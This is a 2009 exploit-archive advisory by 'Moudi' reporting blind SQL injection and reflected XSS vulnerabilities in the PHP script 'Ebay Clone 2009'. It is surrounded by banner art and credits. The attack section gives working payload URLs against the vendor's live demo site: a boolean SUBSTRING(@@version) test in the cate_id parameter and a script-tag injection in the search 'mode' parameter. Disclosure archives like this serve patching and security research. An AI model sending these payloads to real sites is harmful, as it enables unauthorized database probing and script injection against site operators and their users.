[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ebay Clone 2009 (XSS/bSQL) Multiple Remote Vulnerabilities
# Published : 2009-07-10
# Author : Moudi
# Previous Title : Digitaldesign CMS 0.1 Remote Database Disclosure Vulnerability
# Next Title : LionWiki (index.php page) Local File Inclusion Vulnerability


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
        [??] I'm back <3 VB6
==============================================================================
        [??] Ebay Clone 2009 Multiple Remote Vulnerabilities
==============================================================================

	[??] Script:             [ Ebay Clone 2009 ]
	[??] Language:           [ PHP ]
        [??] Download:           [ http://www.ebayclonescript.com/  ]
	[??] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [??] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
        [??] Team:               [ EvilWay ]
        [??] SiteWeb:            [ Visit - www.opensc.ws ]
        [??] Price:              [ 99$ ]

###########################################################################

===[ Exploit BLIND SQL ]===	
	
	[??] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
	[??] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5

===[ Exploit XSS ]===	

        [??] http://www.site.com/patch/search.php?mode=[XSS]
	[??] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Note: in this script have some other blind sql and xss , but i am tired to do all :D


Author: Moudi

###########################################################################

# www.Syue.com [2009-07-10]